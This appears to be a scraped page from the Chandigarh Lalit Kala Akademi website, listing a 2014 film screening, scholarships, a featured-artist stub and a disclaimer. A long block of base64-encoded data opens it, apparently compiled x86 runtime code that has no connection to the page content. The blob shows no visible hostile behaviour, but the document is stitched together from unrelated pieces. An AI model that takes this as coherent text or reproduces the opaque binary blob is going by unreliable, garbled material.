lgAQcgMzwMOLyIPgH8H5BY0EwIsMjYCVABCKRIEEg+BAw6FglQAQVmoUhcBedQe4AAIAAOsGO8Z9 B4vGo2CVABBqBFDocwQAAFmjSIUAEIXAWXUhagRWiTVglQAQ6FoEAABZo0iFABCFwFl1CGoa6O/n //9ZM8m4wHMAEIsVSIUAEIkEEYPAIIPBBD1AdgAQfOozybrQcwAQi/GLwcH+BYPgH4s0tYCVABCN BMCLBIaD+P90BIXAdQODCv+DwiBBgfowdAAQfNFew+gtGgAAgD3wfwAQAHQF6RQZAADDi0QkBLnA cwAQO8FyFz0gdgAQdxArwcH4BYPAHFDoRgMAAFnDg8AgUP8VpGAAEMOLRCQEg/gUfQuDwBxQ6CcD AABZw4tEJAiDwCBQ/xWkYAAQw4tEJAS5wHMAEDvBchc9IHYAEHcQK8HB+AWDwBxQ6FUDAABZw4PA IFD/FahgABDDi0QkBIP4FH0Lg8AcUOg2AwAAWcOLRCQIg8AgUP8VqGAAEMPMzMzMzMzMzMzMi0wk BPfBAwAAAHQUigFBhMB0QPfBAwAAAHXxBQAAAACLAbr//v5+A9CD8P8zwoPBBKkAAQGBdOiLQfyE wHQyhOR0JKkAAP8AdBOpAAAA/3QC682NQf+LTCQEK8HDjUH+i0wkBCvBw41B/YtMJAQrwcONQfyL TCQEK8HDVYvsU1a+/IIAEFdW/xWwYAAQiz2sYAAQM9s5HfiCABB0Dlb/12oT6BMCAABZagFb/3UM /3UI6B4AAABZiUUMhdtZdApqE+hVAgAAWesDVv/Xi0UMX15bXcNVi+yLRQiFwHUCXcODPZSBABAA dRJmi00MZoH5/wB3OWoBiAhYXcONTQiDZQgAUWoA/zVEfQAQUI1FDGoBUGggAgAA/zWkgQAQ/xUc YAAQhcB0BoN9CAB0DujfFQAAxwAqAAAAg8j/XcPMzMxTVotEJBgLwHUYi0wkFItEJBAz0vfxi9iL RCQM9/GL0+tBi8iLXCQUi1QkEItEJAzR6dHb0erR2AvJdfT384vw92QkGIvI
View more...

Upcoming Events


Kandinksy, Bacon, Lady with the Unicorn: Film Screening
Date: 27 Jul, 2014
View more..
 
Exhibitions Scholarships Memorabillia Featured Artists
Exhibitions
Annual Art Exhibition 2009
Scholarships
Chandigarh Lalit Kala Akademi started a scholarship scheme for the first time from 2008 for young artists.
Memorabillia
Pen with Box
Featured Artist
Introduction: Nek Chand Saini is an Indian self-taught artist, famous for build
 
DISCLAIMER: Chandigarh Lalit Kala Akademi accepts no liability for portraits, profiles and art works of artists; content, views, articles, lecture transcripts or video films on any page for the consequences of any actions taken on the basis of the information provided. Any views, opinions, images or facts presented by the artists, writers and speakers or anyone (individual or institution) represented on the site are solely those of the artists, writers and speakers and represented individuals/institutes and do not necessarily represent those of the Akademi.

Website Designed & Sponsored by RedAlkemi. Copyright © 2014 Chandigarh Lalit Kala Akademi. All Rights Reserved. 107625